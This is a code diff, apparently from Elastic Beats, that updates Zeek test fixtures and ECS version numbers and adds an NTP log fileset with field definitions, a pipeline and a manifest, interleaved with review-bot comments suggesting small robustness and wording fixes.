@@ -5127,6 +5207,7 @@ "url.top_level_domain": "com", "user.name": "mmo", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", @@ -5151,8 +5232,8 @@ "observer.vendor": "Apache", "related.hosts": [ "api.example.com", - "https://api.example.com/olore/ntutlab.htm?ameaquei=gnama#esciun", - "www.example.net" + "www.example.net", + "https://api.example.com/olore/ntutlab.htm?ameaquei=gnama#esciun" ], "related.ip": [ "10.195.152.53" @@ -5189,6 +5270,7 @@ "url.top_level_domain": "com", "user.name": "ute", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "mobmail android 2.1.3.3150" }, @@ -5250,6 +5332,7 @@ "url.top_level_domain": "com", "user.name": "emUtenim", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -5274,9 +5357,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://www.example.org/oremi/ectobeat.gif?oreeu=uasiarch#Malor", "internal.example.net", "www.example.org", + "https://www.example.org/oremi/ectobeat.gif?oreeu=uasiarch#Malor", "nimadmin5630.localdomain" ], "related.ip": [ 
@@ -5316,6 +5399,7 @@ "url.top_level_domain": "org", "user.name": "nulapari", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -5340,8 +5424,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://api.example.com/orsitam/tiset.jpg?ati=rauto#doloreeu", "api.example.com", + "https://api.example.com/orsitam/tiset.jpg?ati=rauto#doloreeu", "api.example.org", "sequuntu3563.internal.test" ], @@ -5382,6 +5466,7 @@ "url.top_level_domain": "com", "user.name": "iarchit", "user_agent.device.name": "Android", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80", "user_agent.os.full": "Android 5.1.1", @@ -5405,9 +5490,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "internal.example.com", "https://example.org/rep/mveni.txt?utpers=num#ctetura", - "example.org" + "example.org", + "internal.example.com" ], "related.ip": [ "10.144.111.42" @@ -5443,6 +5528,7 @@ "url.top_level_domain": "org", "user.name": "vento", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", 
@@ -5504,6 +5590,7 @@ "url.top_level_domain": "net", "user.name": "ola", "user_agent.device.name": "XiaoMi Redmi 4X", + "user_agent.device.type": "Phone", "user_agent.name": "MiuiBrowser", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g", "user_agent.os.full": "Android 7.1.2", @@ -5529,8 +5616,8 @@ "observer.vendor": "Apache", "related.hosts": [ "www.example.net", - "https://mail.example.com/ccusant/epteurs.htm?oidentsu=oditau#onsec", "mail.example.com", + "https://mail.example.com/ccusant/epteurs.htm?oidentsu=oditau#onsec", "tdolo2150.www.example" ], "related.ip": [ @@ -5570,6 +5657,7 @@ "url.top_level_domain": "com", "user.name": "iusmodi", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -5594,9 +5682,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "internal.example.org", "mail.example.org", "https://mail.example.org/onemul/trudexe.txt?ura=oreeufug#Quisa", + "internal.example.org", "cinge6032.api.local" ], "related.ip": [ @@ -5636,6 +5724,7 @@ "url.top_level_domain": "org", "user.name": "tamr", "user_agent.device.name": "Samsung SM-S337TL", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 7.0", 
@@ -5659,9 +5748,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "example.com", "https://example.com/lorese/olupta.jpg?onsec=idestl#litani", - "internal.example.org", - "example.com" + "internal.example.org" ], "related.ip": [ "10.51.52.203" @@ -5697,6 +5786,7 @@ "url.top_level_domain": "com", "user.name": "itame", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", @@ -5721,8 +5811,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "internal.example.net", "https://internal.example.net/llitani/uscipit.html?etcons=etco#iuntN", + "internal.example.net", "ende6053.local" ], "related.ip": [ @@ -5762,6 +5852,7 @@ "url.top_level_domain": "net", "user.name": "imipsa", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -5786,8 +5877,8 @@ "observer.vendor": "Apache", "related.hosts": [ "https://mail.example.net/ptat/mipsu.htm?eturadip=amquaera#rsitamet", - "example.net", - "mail.example.net" + "mail.example.net", + "example.net" ], "related.ip": [ "10.106.34.244" @@ -5824,6 +5915,7 @@ "url.top_level_domain": "net", "user.name": "nim", "user_agent.device.name": "Samsung SM-S337TL", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 7.0", 
@@ -5886,6 +5978,7 @@ "url.top_level_domain": "org", "user.name": "ruredol", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -5910,8 +6003,8 @@ "observer.vendor": "Apache", "related.hosts": [ "www.example.org", - "https://www.example.com/bori/dipi.gif?utf=dolor#dexe", - "www.example.com" + "www.example.com", + "https://www.example.com/bori/dipi.gif?utf=dolor#dexe" ], "related.ip": [ "10.2.38.49" @@ -5948,6 +6041,7 @@ "url.top_level_domain": "com", "user.name": "lor", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "mobmail android 2.1.3.3150" }, @@ -5968,9 +6062,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "mail.example.com", "example.com", "https://example.com/iat/tqui.gif?utaliqui=emse#emqui", + "mail.example.com", "didun1193.example" ], "related.ip": [ @@ -6009,6 +6103,7 @@ "url.top_level_domain": "com", "user.name": "atisu", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -6033,9 +6128,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://example.com/caboN/imipsam.jpg?catcupid=ritquiin#quisnost", "example.com", "mail.example.com", + "https://example.com/caboN/imipsam.jpg?catcupid=ritquiin#quisnost", "apari2660.www5.lan" ], "related.ip": [ 
@@ -6074,6 +6169,7 @@ "url.top_level_domain": "com", "user.name": "teirured", "user_agent.device.name": "XiaoMi Redmi 4X", + "user_agent.device.type": "Phone", "user_agent.name": "MiuiBrowser", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g", "user_agent.os.full": "Android 7.1.2", @@ -6140,6 +6236,7 @@ "url.top_level_domain": "net", "user.name": "uira", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -6164,9 +6261,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "www.example.org", "https://www.example.org/roinBCSe/eetdolor.html?tla=iaconseq#sed", "api.example.com", - "www.example.org", "icer123.mail.example" ], "related.ip": [ @@ -6206,6 +6303,7 @@ "url.top_level_domain": "org", "user.name": "culp", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", @@ -6272,6 +6370,7 @@ "url.top_level_domain": "net", "user.name": "deFini", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", 
@@ -6296,8 +6395,8 @@ "observer.vendor": "Apache", "related.hosts": [ "api.example.net", - "https://internal.example.org/teturadi/radipi.gif?upidatat=mod#niamqui", - "internal.example.org" + "internal.example.org", + "https://internal.example.org/teturadi/radipi.gif?upidatat=mod#niamqui" ], "related.ip": [ "10.12.173.112" @@ -6334,6 +6433,7 @@ "url.top_level_domain": "org", "user.name": "mco", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", diff --git a/x-pack/filebeat/module/zeek/_meta/config.yml b/x-pack/filebeat/module/zeek/_meta/config.yml index cc4572f6874..dbe6012df6b 100644 --- a/x-pack/filebeat/module/zeek/_meta/config.yml +++ b/x-pack/filebeat/module/zeek/_meta/config.yml @@ -31,6 +31,8 @@ enabled: true notice: enabled: true + ntp: + enabled: true ntlm: enabled: true ocsp: diff --git a/x-pack/filebeat/module/zeek/capture_loss/config/capture_loss.yml b/x-pack/filebeat/module/zeek/capture_loss/config/capture_loss.yml index 66a028f309d..8acb8ca02f2 100644 --- a/x-pack/filebeat/module/zeek/capture_loss/config/capture_loss.yml +++ b/x-pack/filebeat/module/zeek/capture_loss/config/capture_loss.yml @@ -22,4 +22,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/connection/config/connection.yml b/x-pack/filebeat/module/zeek/connection/config/connection.yml index 71169efdf28..7f5fda3b4ed 100644 --- a/x-pack/filebeat/module/zeek/connection/config/connection.yml +++ b/x-pack/filebeat/module/zeek/connection/config/connection.yml @@ -102,4 +102,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 
diff --git a/x-pack/filebeat/module/zeek/dce_rpc/config/dce_rpc.yml b/x-pack/filebeat/module/zeek/dce_rpc/config/dce_rpc.yml index b14165562ea..062eff8f09a 100644 --- a/x-pack/filebeat/module/zeek/dce_rpc/config/dce_rpc.yml +++ b/x-pack/filebeat/module/zeek/dce_rpc/config/dce_rpc.yml @@ -58,4 +58,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/dhcp/config/dhcp.yml b/x-pack/filebeat/module/zeek/dhcp/config/dhcp.yml index b59227d30df..01c30bd3ae9 100644 --- a/x-pack/filebeat/module/zeek/dhcp/config/dhcp.yml +++ b/x-pack/filebeat/module/zeek/dhcp/config/dhcp.yml @@ -120,4 +120,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/dnp3/config/dnp3.yml b/x-pack/filebeat/module/zeek/dnp3/config/dnp3.yml index 6cd83108b41..beb62e217c7 100644 --- a/x-pack/filebeat/module/zeek/dnp3/config/dnp3.yml +++ b/x-pack/filebeat/module/zeek/dnp3/config/dnp3.yml @@ -68,4 +68,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/dns/config/dns.yml b/x-pack/filebeat/module/zeek/dns/config/dns.yml index 73130461034..fbc26fe59a4 100644 --- a/x-pack/filebeat/module/zeek/dns/config/dns.yml +++ b/x-pack/filebeat/module/zeek/dns/config/dns.yml @@ -210,4 +210,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/dpd/config/dpd.yml b/x-pack/filebeat/module/zeek/dpd/config/dpd.yml index b7a9c30ec10..b65f5dd6441 100644 --- a/x-pack/filebeat/module/zeek/dpd/config/dpd.yml +++ b/x-pack/filebeat/module/zeek/dpd/config/dpd.yml @@ -57,4 +57,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/fields.go b/x-pack/filebeat/module/zeek/fields.go index d048c716bf6..a0740161b64 100644 
--- a/x-pack/filebeat/module/zeek/fields.go +++ b/x-pack/filebeat/module/zeek/fields.go @@ -19,5 +19,5 @@ func init() { // AssetZeek returns asset data. // This is the base64 encoded gzipped contents of module/zeek. func AssetZeek() string { - return "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" + return "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" } diff --git a/x-pack/filebeat/module/zeek/files/config/files.yml b/x-pack/filebeat/module/zeek/files/config/files.yml index 19dfddb9bf5..ece8368600e 100644 --- a/x-pack/filebeat/module/zeek/files/config/files.yml +++ b/x-pack/filebeat/module/zeek/files/config/files.yml @@ -42,4 +42,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/ftp/config/ftp.yml b/x-pack/filebeat/module/zeek/ftp/config/ftp.yml index 6acba2ed0c8..8af9f478f8f 100644 --- a/x-pack/filebeat/module/zeek/ftp/config/ftp.yml +++ b/x-pack/filebeat/module/zeek/ftp/config/ftp.yml @@ -86,4 +86,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/http/config/http.yml b/x-pack/filebeat/module/zeek/http/config/http.yml index 25bdbf709d1..7d94572208c 100644 --- a/x-pack/filebeat/module/zeek/http/config/http.yml +++ b/x-pack/filebeat/module/zeek/http/config/http.yml @@ -94,4 +94,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json b/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json index 0b101cda6e1..df304170733 100644 --- a/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json +++ b/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json 
@@ -59,6 +59,7 @@ "url.username": "user", "user.name": "user", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "com.apple.trustd/2.0", "zeek.http.resp_fuids": [ @@ -127,6 +128,7 @@ "url.original": "/ip", "url.port": 80, "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.58.0", "user_agent.version": "7.58.0", diff --git a/x-pack/filebeat/module/zeek/intel/config/intel.yml b/x-pack/filebeat/module/zeek/intel/config/intel.yml index d48dec70d0e..4a40bd9da5f 100644 --- a/x-pack/filebeat/module/zeek/intel/config/intel.yml +++ b/x-pack/filebeat/module/zeek/intel/config/intel.yml @@ -67,4 +67,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/irc/config/irc.yml b/x-pack/filebeat/module/zeek/irc/config/irc.yml index 58e1d861b13..0f98977aa91 100644 --- a/x-pack/filebeat/module/zeek/irc/config/irc.yml +++ b/x-pack/filebeat/module/zeek/irc/config/irc.yml @@ -72,4 +72,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/kerberos/config/kerberos.yml b/x-pack/filebeat/module/zeek/kerberos/config/kerberos.yml index 6035aa9fba2..4cdcb14dbb5 100644 --- a/x-pack/filebeat/module/zeek/kerberos/config/kerberos.yml +++ b/x-pack/filebeat/module/zeek/kerberos/config/kerberos.yml @@ -104,4 +104,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/modbus/config/modbus.yml b/x-pack/filebeat/module/zeek/modbus/config/modbus.yml index 759dfc78536..5f17276db41 100644 --- a/x-pack/filebeat/module/zeek/modbus/config/modbus.yml +++ b/x-pack/filebeat/module/zeek/modbus/config/modbus.yml @@ -73,4 +73,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 
diff --git a/x-pack/filebeat/module/zeek/mysql/config/mysql.yml b/x-pack/filebeat/module/zeek/mysql/config/mysql.yml index b3f5d82d489..fedacd63dec 100644 --- a/x-pack/filebeat/module/zeek/mysql/config/mysql.yml +++ b/x-pack/filebeat/module/zeek/mysql/config/mysql.yml @@ -72,4 +72,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/notice/config/notice.yml b/x-pack/filebeat/module/zeek/notice/config/notice.yml index 4b09b7bc41f..cd840bd2fed 100644 --- a/x-pack/filebeat/module/zeek/notice/config/notice.yml +++ b/x-pack/filebeat/module/zeek/notice/config/notice.yml @@ -104,4 +104,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/ntlm/config/ntlm.yml b/x-pack/filebeat/module/zeek/ntlm/config/ntlm.yml index bcdf04d899f..3d35ec38bb4 100644 --- a/x-pack/filebeat/module/zeek/ntlm/config/ntlm.yml +++ b/x-pack/filebeat/module/zeek/ntlm/config/ntlm.yml @@ -86,4 +86,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/ntp/_meta/fields.yml b/x-pack/filebeat/module/zeek/ntp/_meta/fields.yml new file mode 100644 index 00000000000..b48dcc20723 --- /dev/null +++ b/x-pack/filebeat/module/zeek/ntp/_meta/fields.yml 
@@ -0,0 +1,63 @@
+- name: ntp
+ type: group
+ default_field: false
+ description: >
+ Fields exported by the Zeek NTP log.
+ fields:
+ - name: version
+ type: integer
+ description: >
+ The NTP version number (1, 2, 3, 4).
+ - name: mode
+ type: integer
+ description: >
+ The NTP mode being used.
+ - name: stratum
+ type: integer
+ description: >
+ The stratum (primary server, secondary server, etc.).
+ - name: poll
+ type: double
+ description: >
+ The maximum interval between successive messages in seconds.
+ - name: precision
+ type: double
+ description: >
+ The precision of the system clock in seconds.
+ - name: root_delay
+ type: double
+ description: >
+ Total round-trip delay to the reference clock in seconds.
+ - name: root_disp
+ type: double
+ description: >
+ Total dispersion to the reference clock in seconds.
+ - name: ref_id
+ type: keyword
+ description: >
+ For stratum 0, 4 character string used for debugging.
+ For stratum 1, ID assigned to the reference clock by IANA.
+ Above stratum 1, when using IPv4, the IP address of the reference clock.
+ Note that the NTP protocol did not originally specify a large enough field to represent IPv6 addresses,
+ so they use the first four bytes of the MD5 hash of the reference clock’s IPv6 address
+ (i.e. an IPv4 address here is not necessarily IPv4).
+ - name: ref_time
+ type: date
+ description: >
+ Time when the system clock was last set or correct.
+ - name: org_time
+ type: date
+ description: >
+ Time at the client when the request departed for the NTP server.
+ - name: rec_time
+ type: date
+ description: >
+ Time at the server when the request arrived from the NTP client.
+ - name: xmt_time
+ type: date
+ description: >
+ Time at the server when the response departed for the NTP client.
+ - name: num_exts
+ type: integer
+ description: >
+ Number of extension fields (which are not currently parsed).
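Review bot: The `ref_time` description ends in "last set or correct", which reads as a truncated sentence; `Time when the system clock was last set or corrected.` is clearer. In the `ref_id` description the closing parenthetical "an IPv4 address here is not necessarily IPv4" is hard to parse, and `(i.e. a value that looks like an IPv4 address is not necessarily one)` says the same thing more plainly. That matters because `ref_id` is a `keyword` that can hold a debug string, an IANA clock ID or hash bytes, so anyone pivoting on it as if it were an IP needs the warning to be unambiguous.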
diff --git a/x-pack/filebeat/module/zeek/ntp/config/ntp.yml b/x-pack/filebeat/module/zeek/ntp/config/ntp.yml
new file mode 100644
index 00000000000..83d43fd686f
--- /dev/null
+++ b/x-pack/filebeat/module/zeek/ntp/config/ntp.yml
@@ -0,0 +1,57 @@
+type: log
+paths:
+{{ range $i, $path := .paths }}
+ - {{$path}}
+{{ end }}
+exclude_files: [".gz$"]
+tags: {{.tags | tojson}}
+publisher_pipeline.disable_host: {{ inList .tags "forwarded" }}
+
+processors:
+ - rename:
+ fields:
+ - {from: message, to: event.original}
+ - decode_json_fields:
+ fields: [event.original]
+ target: zeek.ntp
+ - convert:
+ ignore_missing: true
+ fields:
+ - {from: zeek.ntp.id.orig_h, to: source.address}
+ - {from: zeek.ntp.id.orig_h, to: source.ip, type: ip}
+ - {from: zeek.ntp.id.orig_p, to: source.port, type: long}
+ - {from: zeek.ntp.id.resp_h, to: destination.address}
+ - {from: zeek.ntp.id.resp_h, to: destination.ip, type: ip}
+ - {from: zeek.ntp.id.resp_p, to: destination.port, type: long}
+ - rename:
+ ignore_missing: true
+ fields:
+ - from: zeek.ntp.uid
+ to: zeek.session_id
+ - drop_fields:
+ ignore_missing: true
+ fields:
+ - zeek.ntp.id.orig_h
+ - zeek.ntp.id.orig_p
+ - zeek.ntp.id.resp_h
+ - zeek.ntp.id.resp_p
+ - add_fields:
+ target: event
+ fields:
+ kind: event
+ category:
+ - network
+ type:
+ - connection
+ - protocol
+ - info
+ - add_fields:
+ target: network
+ fields:
+ protocol: ntp
+ transport: udp
+ - community_id:
+ - add_fields:
+ target: ''
+ fields:
+ ecs.version: 1.9.0
diff --git a/x-pack/filebeat/module/zeek/ntp/ingest/pipeline.yml b/x-pack/filebeat/module/zeek/ntp/ingest/pipeline.yml
new file mode 100644
index 00000000000..ed603292a3d
--- /dev/null
+++ b/x-pack/filebeat/module/zeek/ntp/ingest/pipeline.yml
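Review bot: The `decode_json_fields` step in `config/ntp.yml` records nothing when decoding fails, so a truncated or non-JSON line is shipped with only `event.original` set. The ingest pipeline would then presumably fail at its `zeek.ntp.ts` date processor, with an error that does not point back at the decode. Adding `add_error_key: true` under `decode_json_fields` would put the decode failure on the event itself, which makes malformed sensor output easier to spot during triage. Whether the sibling Zeek filesets set this is not visible here, so it may be a module-wide follow-up rather than a change for this file alone.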
@@ -0,0 +1,150 @@ +description: Pipeline for normalizing Zeek ntp.log +processors: + - set: + field: event.ingested + value: '{{_ingest.timestamp}}' + - set: + field: event.created + value: '{{@timestamp}}' + - date: + field: zeek.ntp.ts + formats: + - UNIX + - remove: + field: zeek.ntp.ts + # IP Geolocation Lookup + - geoip: + if: ctx.source?.geo == null + field: source.ip + target_field: source.geo + ignore_missing: true + properties: + - city_name + - continent_name + - country_iso_code + - country_name + - location + - region_iso_code + - region_name + - geoip: + if: ctx.destination?.geo == null + field: destination.ip + target_field: destination.geo + ignore_missing: true + properties: + - city_name + - continent_name + - country_iso_code + - country_name + - location + - region_iso_code + - region_name + # IP Autonomous System (AS) Lookup + - geoip: + database_file: GeoLite2-ASN.mmdb + field: source.ip + target_field: source.as + properties: + - asn + - organization_name + ignore_missing: true + - geoip: + database_file: GeoLite2-ASN.mmdb + field: destination.ip + target_field: destination.as + properties: + - asn + - organization_name + ignore_missing: true + - rename: + field: source.as.asn + target_field: source.as.number + ignore_missing: true + - rename: + field: source.as.organization_name + target_field: source.as.organization.name + ignore_missing: true + - rename: + field: destination.as.asn + target_field: destination.as.number + ignore_missing: true + - rename: + field: destination.as.organization_name + target_field: destination.as.organization.name + ignore_missing: true + - append: + field: "related.ip" + value: "{{source.ip}}" + if: "ctx?.source?.ip != null" + - append: + field: "related.ip" + value: "{{destination.ip}}" + if: "ctx?.destination?.ip != null" + - date: + field: zeek.ntp.ref_time + target_field: zeek.ntp.ref_time + formats: + - UNIX + - date: + field: zeek.ntp.org_time + target_field: zeek.ntp.org_time + formats: + - UNIX + - 
date: + field: zeek.ntp.rec_time + target_field: zeek.ntp.rec_time + formats: + - UNIX + - date: + field: zeek.ntp.xmt_time + target_field: zeek.ntp.xmt_time + formats: + - UNIX + - convert: + ignore_missing: true + field: zeek.ntp.version + type: integer + - convert: + ignore_missing: true + field: zeek.ntp.mode + type: integer + - convert: + ignore_missing: true + field: zeek.ntp.stratum + type: integer + - convert: + ignore_missing: true + field: zeek.ntp.num_exts + type: integer + - convert: + ignore_missing: true + field: zeek.ntp.poll + type: double + - convert: + ignore_missing: true + field: zeek.ntp.precision + type: double + - convert: + ignore_missing: true + field: zeek.ntp.root_delay + type: double + - convert: + ignore_missing: true + field: zeek.ntp.root_disp + type: double + - convert: + ignore_missing: true + field: zeek.ntp.ref_id + type: string + - set: + field: network.type + value: ipv4 + if: ctx.source?.ip.contains('.') + - set: + field: network.type + value: ipv6 + if: ctx.source?.ip.contains(':') +on_failure: +- set: + field: error.message + value: '{{ _ingest.on_failure_message }}' diff --git a/x-pack/filebeat/module/zeek/ntp/manifest.yml b/x-pack/filebeat/module/zeek/ntp/manifest.yml new file mode 100644 index 00000000000..034861b73fe --- /dev/null +++ b/x-pack/filebeat/module/zeek/ntp/manifest.yml @@ -0,0 +1,19 @@ +module_version: 1.0 + +var: + - name: paths + default: + - /var/log/bro/current/ntp.log + os.linux: + - /var/log/bro/current/ntp.log + os.darwin: + - /usr/local/var/logs/current/ntp.log + - name: tags + default: [zeek.ntp] + +ingest_pipeline: ingest/pipeline.yml +input: config/ntp.yml + +requires.processors: +- name: geoip + plugin: ingest-geoip diff --git a/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log b/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log new file mode 100644 index 00000000000..9799c888dba --- /dev/null +++ b/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log 
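Review bot: The four `date` processors in `ingest/pipeline.yml` for `zeek.ntp.ref_time`, `org_time`, `rec_time` and `xmt_time` run unconditionally, so a record missing any one of them would, as far as I can tell, drop into `on_failure` and skip the later `convert` and `network.type` steps. Each could carry a guard such as `if: ctx.zeek?.ntp?.ref_time != null`. The two `network.type` conditions have a similar gap: `ctx.source?.ip.contains('.')` only null-guards `source`, while `source.ip` comes from a Filebeat `convert` with `ignore_missing: true` and can be absent. `if: ctx.source?.ip != null && ctx.source.ip.contains('.')` (and the `':'` counterpart) avoids the null dereference. Separately, the expected output shows zeroed NTP timestamps indexed as `1970-01-01T00:00:00.000Z`; a comment such as `# 0 means "unset" in NTP; indexed as the Unix epoch` next to those processors would stop analysts reading them as real timeline events.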
@@ -0,0 +1,2 @@
